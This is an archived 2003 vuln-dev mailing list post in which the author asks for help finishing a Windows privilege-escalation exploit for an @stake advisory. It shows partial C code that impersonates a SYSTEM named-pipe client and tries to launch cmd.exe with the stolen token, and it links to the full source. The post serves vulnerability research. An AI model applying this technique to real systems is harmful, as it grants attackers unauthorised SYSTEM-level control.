Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair (wirepair_at_roguemail.net)
Date: 07/14/03

  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"
    To: vuln-dev@securityfocus.com
    Date: Mon, 14 Jul 2003 12:45:37 -0700
    
    

    Hello, I'm attempting to finish up my exploit for the
    @stake advisory, i've hit quite a snag when i found out
    that calling a new process does not inherit the privileges
    of the named pipe. (I must have been thinking of fork() or
    something heh). So I can impersonate SYSTEM, but I can not
    create a new process with these nice privileges. Here is
    where i am at:
    ConnectNamedPipe() <-- yada yada wait for connection
       if (!ImpersonateNamedPipeClient (hPipe)) // impersonate
    the pipe so we now are SYSTEM.
       {
         printf ("Failed to impersonate the named pipe.\n");
         CloseHandle(hPipe);
         return 5;
       }
    // found this on msdn, i'm trying to get a token with full
    access, then call CreateProcessAsUser();
       if (!OpenThreadToken(GetCurrentThread(),
    TOKEN_ALL_ACCESS, TRUE, &hToken )) {
                 if (hToken != INVALID_HANDLE_VALUE) {
                  CloseHandle(hToken);
                             printf("damn: %u\n", GetLastError());
                     }
       }

      MapGenericMask( &dwAccessDesired, pGeneric ); //this i'm
    kinda shady on, looks like i'm just mapping the id to the
    SYSTEM name? when i call GetUserName i get garble after
    the OpenThreadToken unless i call MapGenericMask...

    CreateProcessAsUser(hToken, "cmd.exe",
    NULL,NULL,NULL,true,NULL,NULL,NULL,&si, &pi);
       CloseHandle(hPipe);

    now i call createprocessasuser, using the token from
    openthreadtoken. In the debugger, it tries to execute cmd,
    but but i get nothing back... if anyone wants to see my
    code it's at http://sh0dan.org/files/tac0tac0.c... Thanks
    this is starting to bug me :),
    -wire
    _____________________________
    For the best comics, toys, movies, and more,
    please visit <http://www.tfaw.com/?qt=wmf>


  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"